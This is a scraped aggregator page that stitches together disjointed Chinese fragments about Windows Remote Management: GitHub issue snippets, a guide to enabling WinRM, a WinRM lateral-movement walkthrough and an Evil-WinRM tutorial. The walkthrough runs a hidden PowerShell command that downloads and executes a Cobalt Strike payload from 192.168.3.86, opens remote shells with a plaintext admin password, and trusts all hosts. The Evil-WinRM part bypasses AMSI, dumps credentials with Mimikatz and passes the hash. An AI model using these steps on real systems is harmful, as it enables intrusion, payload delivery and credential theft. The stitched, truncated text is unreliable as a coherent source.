精华内容
下载资源
问答
  • WinRM 2.0

    2020-12-27 00:45:26
    <div><p>该提问来源于开源项目:WinRb/WinRM</p></div>
  • : Unable to activate em-winrm-0.7.0, because winrm-1.7.3 conflicts with winrm (~> 1.3.0) (Gem::ConflictError) <p>I am using: - chefdk 0.12.0 - knife-windows (1.4.0, 1.1.1, 1.0.0, 1.0.0.rc.2, 0.8.6)...
  • WinRM V2

    2021-01-03 08:11:31
    <div><p>closes #106, #105, #169, #197, #203, #208, #194</p><p>该提问来源于开源项目:WinRb/WinRM</p></div>
  • - Port of 's WinRM changes from https://github.com/sneal/go-winrm (excluding wide-spread breakage introduced in 59fb19b77c698e3497813ffc7b879e245b3a5c06....masterzen/winrm</p></div>
  • <p>In addition to the winrm-transport, some of the logic in <code>Kitchen::Transport::WinRM</code> was also moved to the core winrm gem.</p><p>该提问来源于开源项目:test-kitchen/test-kitchen</p>...
  • <div><p>…lity bug with winrm 1.5</p><p>该提问来源于开源项目:chef/knife-windows</p></div>
  • WinRM not working

    2020-12-30 01:20:54
    <div><p>For some reason the packer build gets stuck in the <code>Waiting for WinRM to become available</code> phase: <pre><code> packer build -only=windows-2016-amd64-vsphere -on-error=abort ...
  • WinRM Auth Issue

    2020-12-25 19:58:17
    <p>I have tried using the winrm module and have come across the below error when trying to access a remote resource. <p>HTTP ERROR: 401 HEADERS= connectionclosewww-...
  • winrm Time out

    2020-12-26 00:00:19
    <pre><code> I am using vsphere-clone and while I am trying to setup getting winrm time out </code></pre> <p>==> vsphere-clone: Power on VM... ==> vsphere-clone: Waiting for IP......
  • WinRM ProtocolError

    2020-12-30 12:45:56
    <p>i am trying to connect a server through the winrm. But getting below error. <p>Could someone please help me on this. Error: 19:34:52 [overthere-winrm:] failed: WinRM Error: Unexpected ...
  • Message: WinRM Transport requires the vagrant-winrm Vagrant plugin to properly communicate with this Vagrant VM. Please install this plugin with: `vagrant plugin install vagrant-winrm' and ...
  • winrm service

    2018-02-17 21:28:00
    今天看脚本忽然发现一个服务,叫winRM服务,这是个PowerShell的远程管理。开启它可以很大程度的方便用PowerShell操控! 下面是我找到的一些资料: 在Linux中,我们可以使用安全的SSH方便的进行远程管理。但在...

    今天看脚本忽然发现一个服务,叫winRM服务,这是个PowerShell的远程管理。开启它可以很大程度的方便用PowerShell操控!

    下面是我找到的一些资料:

    Linux中,我们可以使用安全的SSH方便的进行远程管理。但在Windows下,除了不安全的Telnet以外,从Windows Server 2008开始提供了另外一种命令行原创管理方式,那就是基于PowerShell的WinRM。  下面就介绍下如何使用WinRM,客户端和服务端必须为同一域:

    1、在Windows Server 2008上配置WinRM:

    C:\Windows\system32> winrm quickconfig 在此计算机上,WinRM 已设置为接收请求。 WinRM 没有设置成为了管理此计算机而允许对其进行远程访问。 必须进行以下更改: 在 HTTP://* 上创建 WinRM 侦听程序接受 WS-Man 对此机器上任意 IP 的请求。 进行这些更改吗[y/n]? y WinRM 已经进行了更新,以用于远程管理。在 HTTP://* 上创建 WinRM 侦听程序接受 WS-Man 对此机器上任意 IP 的请求。  

    2、开启防火墙命令或者直接关闭防火墙:

    C:\Windows\system32>netsh advfirewall firewall set rule group="Windows 远程管理" new enable=yes

    3、使用PowerShell连接远程服务器:

     PS C:\Users\WW-PC>Enter-PSSession -computer 服务器名或者IP  

    Enter-PSSession : 连接到远程服务器失败,错误消息如下: WinRM 客户端无法处理该请求。如果身份验证方案与 Kerberos 不同,或  者客户端计算机未加入到域中, 则必须使用 HTTPS 传输或者必须将目标计算机添加到 TrustedHosts 配置设置。 使用 winrm.cmd 配  置 TrustedHosts。请注意,TrustedHosts 列表中的计算机可能未经过身份验证。 通过运行以下命令可获得有关此内容的更多信息: wi  nrm help config。 有关详细信息,请参阅 about_Remote_Troubleshooting 帮助主题。  所在位置 行:1 字符: 16  + Enter-PSSession <<<<? 192.168.3.1 -Credential abc\administrator        + CategoryInfo            : InvalidArgument: (192.168.3.1:String) [Enter-PSSession], PSRemotingTransportException        + FullyQualifiedErrorId : CreateRemoteRunspaceFailed

     

     

    网上一般都是说要添加一个TrustedHosts表,相当于一个信任列表。

    执行如下命令,将IP为192.168.3.*的主机都加入信任列表

    Set-Item wsman:\localhost\Client\TrustedHosts -value 192.168.3.*

    注意这个命令需要在 客户端上执行 不是在服务端执行 且客户端需要已管理员权限执行,这一点许多教程没有说,走了不少弯路。

    之后再用 Enter-PSSession 192.168.3.1 -Credential abc\administrator 命令就可以完成连接了,没有域的话就直接写用户名。

     

    顺便提一下,如果你想在任何时间禁用WinRM,你可以使用这样的命令:

      winrm delete winrm/config/listener?IPAdress=*+Transport=HTTP

     

    https://www.cnblogs.com/gamewyd/p/6805595.html

    转载于:https://www.cnblogs.com/chuancheng/p/8452202.html

    展开全文
  • WIP: Winrm

    2020-11-25 03:10:11
    $ pyinfra 192.168.2.246 --winrm_username vagrant --winrm_password vagrant --winrm_port 5985 exec -- echo hello --> Loading config... --> Loading inventory... --> Connecting to hosts... [192...
  • evil-winrm

    2021-01-02 03:09:15
    <div><p>https://github.com/Hackplayers/evil-winrm</p>该提问来源于开源项目:BlackArch/blackarch</p></div>
  • winrm-cli - 一个命令行工具通过WinRM在Windows机器上远程执行命令
  • WinRM and Kerberos

    2020-12-26 09:39:50
    <div><p>Hello Guys, Can you please guide me in setting up WinRB to work with Kerberos authentication. I am able to get it work with Basic and Unencrypted authentication....WinRb/WinRM</p></div>
  • 这个Vagrantfile能够在分发的机器上自动配置WinRM。 换句话说,这个Vagrantfile能够: 禁用防火墙(Microsoft分发的框默认配置为启用防火墙); 将网络位置类型更改为“工作网络”(默认情况下,Microsoft分发的框...
  • winRM横向移动

    2020-02-15 20:07:18
    0x01 winRM简介 WinRM 是 Microsoft 对 WS-Management 协议的实现,WS-Management 协议即一种基于标准简单对象访问协议[SOAP]的 “防火墙友好” 协议,它让来自不同供应商的硬件和操作系统能够互相操作。winRM的默认...

    在这里插入图片描述

    0x01 winRM简介

    WinRM 是 Microsoft 对 WS-Management 协议的实现,WS-Management 协议即一种基于标准简单对象访问协议[SOAP]的 “防火墙友好” 协议,它让来自不同供应商的硬件和操作系统能够互相操作。winRM的默认端口为5985(http)或5986(https)。
    winRM横向移动同时适用于工作组和域环境

    0x02 利用条件

    1、在win 2012之后(包括win 2012)的版本是默认开启的,win 2012之前利用需要手动开启winRM。
    2、防火墙对5986、5985端口开放。

    0x03 通过winRM横向移动

    一、查看本地和目标是否开放winRM服务

    1、查看本地是否运行winRM服务。

    netstat -ano |findstr 5985
    Get-WmiObject -Class win32_service | Where-Object {$_.name -like "WinRM"}
    

    在这里插入图片描述

    2、查看目标是否运行winRM服务。

    nmap -sV 192.168.3.73 -p5985,5986
    

    在这里插入图片描述
    3、查看目标机器的winRM服务是否工作正常,如图所示为正常。

    powershell -exec bypass
    Test-WsMan 192.168.3.73
    

    在这里插入图片描述

    二、通过winRM在目标主机上执行任意命令

    命令执行
    1、在第一次执行命令的时候,可能会报下列错误。
    在这里插入图片描述
    这时我们执行下列两条命令,将当前主机的trustedhosts设置为*,表示信任任意主机,之后重启winRM。

    Set-Item WSMan:localhost\client\trustedhosts -value *
    Restart-Service WinRM
    

    在这里插入图片描述

    2、设置完成后执行下列命令,输入之前收集到的密码。

    Invoke-Command -ComputerName 192.168.3.73 -ScriptBlock { ipconfig } -credential administrator
    

    在这里插入图片描述
    命令执行成功。
    在这里插入图片描述

    3、直接执行cs payload,弹回一个cs beacon。

    Invoke-Command -ComputerName 192.168.3.73 -ScriptBlock { powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.3.86:80/a'))" } -credential administrator
    

    在这里插入图片描述
    cs成功接收到会话。
    在这里插入图片描述

    反弹shell
    1、通过Enter-PSSession直接弹回一个cmd shell。

    Enter-PSSession -ComputerName 192.168.3.73 -Credential administrator
    

    在这里插入图片描述
    反弹shell成功。
    在这里插入图片描述

    三、Windows内置工具winrs的使用

    命令执行

    winrs -r:192.168.3.73 -u:administrator -p:Admin!@#45 "ipconfig"
    

    在这里插入图片描述

    反弹shell

    winrs -r:192.168.3.73 -u:administrator -p:Admin!@#45 "cmd"
    

    在这里插入图片描述

    展开全文
  • Support Windows & WinRM

    2020-12-02 07:29:32
    <div><p>This PR builds on top of the excellent work by in #115, and finishes off the WinRM support. <p>Its still a work in progress, but the basics are working. <p>Things that are outstanding: - [x] ...
  • winrm 2.3.0 potential issues

    2020-11-29 10:49:42
    <p>WinRM 2.3.0 throws: <pre><code> D [WinRM] opening remote shell on http://ec2-35-177-242-32.eu-west-2.compute.amazonaws.com:5985/wsman D [WinRM] Endpoint doesn't support config request for ...
  • - Updates WinRM gem usage to 2.0 API - Replaces file upload code with wintm-fs (same code used by test-kitchen, inspec and vagrant) with its 1.0 implementation its orders of mafnitude faster the the ...
  • 什么是WinRM

    千次阅读 2019-03-22 18:05:28
    什么是WinRMWinRM = Windows Remote Management, Windows Remote Management (WinRM) is the Microsoft implementation of WS-Management Protocol, a standard Simple Object Access Protocol (SOAP)-based, ...

    什么是WinRM?
    WinRM = Windows Remote Management, Windows Remote Management (WinRM) is the Microsoft implementation of WS-Management Protocol, a standard Simple Object Access Protocol (SOAP)-based, firewall-friendly protocol that allows hardware and operating systems, from different vendors, to interoperate.

    The WS-Management protocol specification provides a common way for systems to access and exchange management information across an IT infrastructure. WinRM and Intelligent Platform Management Interface (IPMI), along with the Event Collector are components of the Windows Hardware Management features.

    参考官方文档:https://docs.microsoft.com/en-us/windows/desktop/winrm/portal

    WinRM2.0默认端口5985(HTTP端口)或5986(HTTPS端口)。

    如何开启WinRM?
    以管理员权限运行PowerShell,然后输入以下命令:

    Enable-PSRemoting cmdlet 

    什么是WinRM

    以管理员权限运行下面的命令,查看winrm监听信息:

    winrm e winrm/config/listener

    转载于:https://blog.51cto.com/jiaszwx/2367499

    展开全文
  • Port to Winrm v2

    2020-12-01 16:19:57
    (Since we need to use <code>WinRM::Connection</code> instead of <code>WinRM::WinRMWebService) <p>I thought I would still open the PR and see...</p><p>该提问来源于开源项目:mizzy/specinfra</p></...
  • Evil-Winrm : Winrm Pentesting Framework(远程渗透管理工具)Evil-winrmFeaturesInstallationLoad PowerShell scriptsPass the HashInstall using its Docker image 在这篇文章中,我们将讨论最著名的PS远程shell...

    Evil-Winrm : Winrm Pentesting Framework(远程渗透管理工具)

    在这篇文章中,我们将讨论最著名的PS远程shell黑客框架工具——Evil-Winrm。它是一个开源工具,可以在GitHub上进行winrm渗透测试。
    目录内容
    • Evil-winrm
    • Features
    • Installation
    • Load PowerShell scripts
    • Pass the Hash
    • Install using its Docker image

    Evil-winrm

    此程序可以在启用了此功能的任何Microsoft Windows Server上使用(通常在端口5985上),当然只有在您具有使用它的凭据和权限的情况下。 因此,我们可以说它可以用于开发后的骇客入侵/入侵阶段。 该程序的目的是为黑客提供良好且易于使用的功能。 系统管理员也可以出于合法目的使用它,但是它的大多数功能都集中在黑客/滥用东西上。

    Features

    • 兼容Linux和Windows客户端系统
    • 加载内存Powershell脚本
    • 绕过某些AV加载内存dll文件
    • 绕过某些AV加载到内存C#(C Sharp)程序集中
    • 加载使用很棒的甜甜圈技术生成的x64负载
    • AMSI旁路
    • 哈希传递支持
    • Kerberos身份验证支持
    • SSL和证书支持
    • 上传和下载显示进度条的文件
    • 列出没有特权的远程机器服务
    • 命令历史
    • WinRM命令完成
    • 本地文件完成
    • 提示和输出消息的着色(可以选择禁用)
    • Docker支持(可在Dockerhub上获得预构建映像)
    • 陷阱捕获可避免在Ctrl + C上意外退出外壳

    Installation

    在帖子中,我们讨论了在 Kali Linux 中安装 winrm 的两种简单方法,您将找到更多从 GitHub 安装的方法。在 Ruby gem 的帮助下,您可以直接安装evil-winrm,它可以通过执行以下命令自动在您的计算机中安装所有依赖项。
    gem install evil-winrm
    一旦安装,你可以拉其HELP选项,通过键入"邪恶赢",将显示语法和其他运算符,以执行邪恶的赢对窗口远程管理服务。
    在这里插入图片描述
    现在使用邪恶的Winrm,我们尝试通过打开对Winrm开放的端口5985来访问远程机器外壳。 结果,它将通过提供如下所示的Powershell来访问受害者shell。
    Syntax: evil-winrm -i -u -p <’password’>
    evil-winrm -i 192.168.1.105 -u administrator -p ‘Ignite@987’
    在这里插入图片描述
    它不仅会提供主机的外壳,还会提供菜单来加载功能,例如Invoke-Binary,Dll-Loader,Doughnut-Loader和Bypass-4MSI。
    在这里插入图片描述

    Load PowerShell scripts

    因此,我们在/ root / powershell中有一些笔测试powershell脚本,我们可以通过主机上的邪恶Winrm上载此ps1脚本。
    在这里插入图片描述
    .PS1 脚本必须位于 -s 参数处的路径设置中,并按如下所示执行此脚本:Syntax: evil-winrm -i -u -p <’password’> -s
    evil-winrm -i 192.168.1.105 -u administrator -p ‘Ignite@987’ -s /root/powershell
    再次键入菜单,查看加载的功能,并使用Bypass 4 MSI,然后调用脚本。 在这里,我们尝试上载mimikatz PowerShell脚本以转储存储的凭据。
    menu
    Bypass 4MSI
    Invoke-Mimikatz.ps1
    Invoke-Mimikatz
    结果,它已转储了Windows Server的所有凭据。 😈
    在这里插入图片描述

    Pass the Hash

    它还有一个功能,允许您执行通过 HASH 攻击,因此它给出了主机的外壳。
    在这里插入图片描述

    Install using its Docker image

    这是一种非常简单和方便的方法,可以安装在攻击机上的 winrm,同时通过损害其 winrm 服务来提供受害者机器的外壳。只有您需要执行以下命令。
    docker run --rm -ti --name evil-winrm oscarakaelvis/evil-winrm -i 192.168.1.105 -u Administrator -p ‘Ignite@987’

    在这里插入图片描述

    展开全文
  • <p><code>DEBUG: [WinRM] Waiting for output... DEBUG: [WinRM] cleaning up command_id: 1620B3BF-318B-4D47-9AB9-FB158EA2B665 on shell_id 93CB3B1D-3483-4E1C-8513-444C58C29388 C:/opscode/chefdk/embedded/...
  • Implement a WinRM runner

    2021-01-10 15:29:35
    <p>This is a runner that utilizes WinRM to connect to a remote Windows host for command and script execution. I've chosen to implement it using the <code>pywinrm</code> library ...
  • - ASIDE - knife Winrm does not have this issue because it executes <a href="https://github.com/chef/knife-windows/blob/v1.1.0/lib/chef/knife/winrm.rb#L63">this method</a> which has code near the ...
  • <p>More cleanup will be needed later on, but this is a step that eliminates the winrm dependency from brooklyn-core</p><p>该提问来源于开源项目:apache/incubator-brooklyn</p></div>
  • Add winrm 1.7 support

    2020-11-26 13:54:42
    <div><p>WinRM 1.7 fixes the issue addressed by closed PR https://github.com/ManageIQ/manageiq/pull/6720 which required reopening the WinRM executor after every 1500 commands on the same connection. No...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 1,495
精华内容 598
关键字:

winrm